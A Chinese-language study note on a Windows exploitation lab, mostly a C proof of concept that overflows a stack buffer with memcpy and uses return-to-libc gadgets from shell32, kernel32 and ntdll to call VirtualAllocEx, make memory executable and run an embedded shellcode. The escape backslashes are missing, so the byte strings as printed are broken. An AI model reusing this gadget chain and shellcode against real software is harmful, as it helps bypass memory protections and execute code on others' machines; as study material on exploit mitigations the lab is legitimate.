Ret2libc 利用 VirtualAlloc

此文章只是 笔记··································

下面的实验 还是 memcpy 进行 不能直接利用

LPVOID VirtualAlloc(
LPVOID lpAddress, // 要分配的内存区域的地址     0x00030000
DWORD dwSize,     // 分配的大小                 0xff
DWORD flAllocationType, // 分配的类型           0x1000  MEM_COMM
DWORD flProtect   // 该内存的初始保护属性       0x40
);

函数成功 返回 申请内存的起始地址······申请失败 返回NULL

构造玩参数后 直接跳向 VirtualAllocEx

// GS_Virtual.cpp : 定义控制台应用程序的入口点。
//

#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <windows.h>

char shellcode[]=

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
"x90x90x90x90"

/*
地址=7D72E0E5
消息=Found:PUSH ESP POP EBP RET 4 at 0x7d72e0e5     Module:  C:WINDOWSsystem32shell32.dll*/

"xe5xe0x72x7d"//修正EBP retn 4
"xf4x9ax80x7C"// 7C809AF4    E8 09000000     call kernel32.VirtualAllocEx

"x90x90x90x90"
"xFFxFFxFFxFF"//-1当前进程
"x00x00x03x00"//申请空间起始地址
"xFFx00x00x00"//申请空间大小
"x00x10x00x00"//申请类型
"x40x00x00x00"//申请空间访问类型
"x90x90x90x90"
/*
7C80997D    58              pop eax   kernerl32.dll
7C80997E    C3              retn
*/
"x7dx99x80x7c"//pop eax retn

"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
"x90x90x90x90"
/*
地址=7C94D75D
消息=Found:POP EDI POP ESI  RETN at 0x7c94d75d     Module:  C:WINDOWSsystem32
tdll.dll
*/
"x5dxd7x94x7C"//pop pop retn
"xe5xe0x72x7d"//修正EBP retn4

/*
地址=7D74CFDA
消息=Found:POP EBX  RETN at 0x7d74cfda     Module:  C:WINDOWSsystem32shell32.dll
*/
"xdaxcfx74x7d"

"x00x00x03x00"//可执行内存空间地址，转入执行用
"x00x00x03x00"//可执行内存空间地址，拷贝用

/*
77EBC6C6    54              push esp
*/
"xc6xc6xebx77"//push esp jmp eax && 原始shellcode起始地址
"xFFx00x00x00"//shellcode长度

"x75x6fxc1x77"//memcpy 77C16F75    8B75 0C         mov esi,dword ptr ss:[ebp+0xC]



"x00x00x03x00"//一个可以读地址
"x00x00x03x00"//一个可以读地址
"x90x90x90x90"

"xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
"x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
"x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
"x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
"xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
"x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
"xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
"xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
"x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
"x53"
"x68x64x61x30x23"
"x68x23x50x61x6E"
"x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";//168

void test()
{
	char tt[176];
	memcpy(tt,shellcode,450);
}
int main()
{
	HINSTANCE hInst = LoadLibrary("shell32.dll");
	char temp[200];
	test();
    return 0;
}

尽量 寻找  系统DLL上的代码  不要程序自身的代码 当然也有例外·······实验得真理······················